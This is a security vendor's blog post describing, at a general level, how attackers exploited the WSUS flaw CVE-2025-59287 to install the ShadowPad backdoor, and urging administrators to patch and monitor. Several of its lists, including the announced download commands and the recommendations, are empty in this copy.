When you hear about ShadowPad, you know you’re not dealing with ordinary malware. For years, it has been one of the favorite tools of espionage groups linked to the Chinese state—and now it's back, exploiting a critical flaw in Windows Server Update Services (WSUS).
If you manage Windows servers or enterprise infrastructure, this incident directly concerns you. At TecnetOne, we break down what happened, why it’s so dangerous, and what you must do immediately to protect your systems.
According to an analysis by AhnLab Security Intelligence Center (ASEC), malicious actors began exploiting a newly patched WSUS vulnerability—CVE-2025-59287—to gain initial access to Windows servers.
WSUS is the service responsible for distributing updates within corporate networks. It’s a key point for deploying trusted software and patches. Precisely because of this, it's a prime target for attackers.
What’s alarming is that this vulnerability allows for remote code execution with SYSTEM privileges—essentially, full control over the server.
Similar titles: Microsoft Redesigns Windows Security Without Antivirus in the Kernel
Once the vulnerability is exploited, attackers use PowerCat, a PowerShell-based utility similar to Netcat, to gain a remote shell on the server.
These tools are legitimate and commonly used in IT administration, making them hard to detect by traditional antivirus solutions.
Then, with elevated privileges, attackers download ShadowPad using two well-known commands:
This combination of “normal” tools helps the attack evade detection—especially in companies without advanced monitoring.
ShadowPad is not your average malware. It’s a modular backdoor used almost exclusively by Chinese espionage groups. SentinelOne once called it “a masterpiece of espionage malware.”
Its capabilities include:
It’s widely considered the successor to PlugX, another well-known Chinese APT malware.
Although no group has officially claimed the current attack, the use of ShadowPad strongly suggests a sophisticated threat actor.
ShadowPad installed via CVE-2025-59287 exploit (Source: The Hacker News)
To execute ShadowPad, attackers used DLL side-loading, a method where a malicious DLL is placed where a legitimate app expects an official library.
The process went like this:
This method is favored by APT groups because it avoids file-based detection and complicates forensic analysis.
Once deployed, ShadowPad’s main module activates:
With this, attackers have persistent, full control—even after rebooting or changing configurations.
For companies lacking advanced detection, the intrusion may remain unnoticed for weeks or months.
As expected, exploitation surged within 48 hours of the public Proof of Concept (PoC).
Threat actors began scanning the internet for exposed WSUS instances. ASEC confirmed that many attacks followed an automated pattern:
Some attackers even deployed Velociraptor, a legitimate digital forensics tool, likely to evaluate the environment or assess the value of the target.
Learn more: Windows 11 to Sync Clipboard with Android: What to Expect
If you run Windows servers—especially with internal WSUS—you should be on high alert.
This vulnerability:
In short, it’s a perfect storm for corporate espionage, sabotage, data theft, or lateral movement into high-value assets.
And it doesn’t just affect large companies—any exposed or misconfigured WSUS is fair game.
To avoid ShadowPad and others from exploiting this flaw, we recommend:
ShadowPad’s exploitation of a critical WSUS vulnerability is more than just another incident—it’s a warning sign of how digital espionage is evolving. One poorly secured service can give attackers the keys to your entire infrastructure.
At TecnetOne, we always say the same: your defensive speed must match the attacker's.
Patch, monitor, and audit—because letting a nation-grade threat take over your systems is no longer a far-fetched scenario. It's one click away.